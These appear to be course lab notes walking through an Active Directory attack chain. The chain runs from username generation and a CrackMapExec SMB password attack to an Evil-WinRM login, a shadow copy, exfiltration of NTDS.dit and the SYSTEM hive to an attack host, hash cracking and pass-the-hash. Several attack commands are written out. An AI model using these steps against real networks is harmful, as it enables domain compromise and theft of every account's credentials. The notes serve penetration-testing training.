Active Directory and NTDS.dit

Username Anarchy

Generate candidate usernames in common corporate formats (first.last, flast, f.last and so on) from a list of real names, so the output can be fed to the password attack below:

./username-anarchy -i /home/ltnbob/names.txt

Attacking with CrackMapExec

Dictionary attack over SMB against one known username. Every failed attempt counts against the domain lockout threshold, so check the lockout policy before running a long wordlist against a single account:

$ crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

Capturing NTDS.dit

Connecting to the DC using Evil-WinRM

Authenticates over WinRM with the recovered password, which gives an interactive PowerShell session on the domain controller:

$ evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'

Checking Local Group Membership

On its own, net localgroup only lists the local groups; pass a group name (for example Administrators) as its argument to see that group's members and confirm whether the current account is in it:

*Evil-WinRM* PS C:\> net localgroup

Checking User Account Privileges including Domain

Shows the account's group memberships and password settings. Add the /domain switch when the session is on a member host rather than a domain controller; on a DC, net user already queries Active Directory:

*Evil-WinRM* PS C:\> net user bwilliamson

Creating Shadow Copy of C

The live NTDS.dit is held open by the directory service and cannot be copied directly, so take a Volume Shadow Copy snapshot of C: first. This requires local Administrators (or Backup Operators) rights:

*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

Copying NTDS.dit from the VSS

Copy the file out of the shadow volume path reported by vssadmin rather than from C:\Windows\NTDS. The SYSTEM registry hive must be exported as well, because the boot key it holds is needed to decrypt the password hashes stored in NTDS.dit.

Transferring NTDS.dit to the Attack Host

Serve an SMB share from the attack host (for example with Impacket's smbserver.py) and copy NTDS.dit and the SYSTEM hive to it.

Using CrackMapExec to capture NTDS.dit

CrackMapExec can do the whole extraction remotely in one step with its --ntds option, using the same SMB credentials as the dictionary attack above, and prints the hashes directly instead of leaving NTDS.dit and the SYSTEM hive to copy by hand.

Cracking Hashes and Gaining Credentials

The extracted NT hashes are unsalted MD4 digests of the UTF-16LE password, so a single wordlist pass with hashcat in NTLM mode (-m 1000) tests every account in the dump at once.

Pass-the-Hash using Evil-WinRM

Hashes that do not crack are still usable: Evil-WinRM accepts the NT hash in place of a password (the -H option), so any extracted account that is allowed to use WinRM can be logged into without knowing its cleartext password.
